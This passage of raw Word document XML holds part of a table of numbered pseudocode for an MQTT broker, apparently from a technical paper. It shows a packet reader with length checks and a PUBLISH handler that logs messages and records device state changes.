              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> PUBLISH topic and payload, client IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="077446CA" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (packet type, flags, body) or Malformed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> changed device state or None; state_change event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="678C4C23" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> read_packet(sock):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      first ← recv_exact(sock, 1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      rem ← decode_remaining_length()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> rem &gt; MAX_PACKET </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">raise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Malformed("too large")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      body ← recv_exact(sock, rem)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> first &gt;&gt; 4, first &amp; 0x0F, body</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> decode_remaining_length():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      mult ← 1; value ← 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> i ← 1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11:         b ← recv_exact(sock, 1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12:         value ← value + (b &amp; 0x7F) × mult</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> b &amp; 0x80 = 0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> value</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">14:         mult ← mult × 128</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">15:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">16:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">raise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Malformed("length &gt; 4 bytes")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">17: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> recv_exact(sock, n):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">18:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">while</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> len(buf) &lt; n </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> buf += recv(n−len)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">19:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// fixes the v0.3 &gt;127-byte bug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> on_publish(topic, payload):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      log("mqtt_publish", topic, payload)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      changed ← apply_control(topic, payload)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> changed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> log("state_change")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:      deliver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> matching subscribers</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
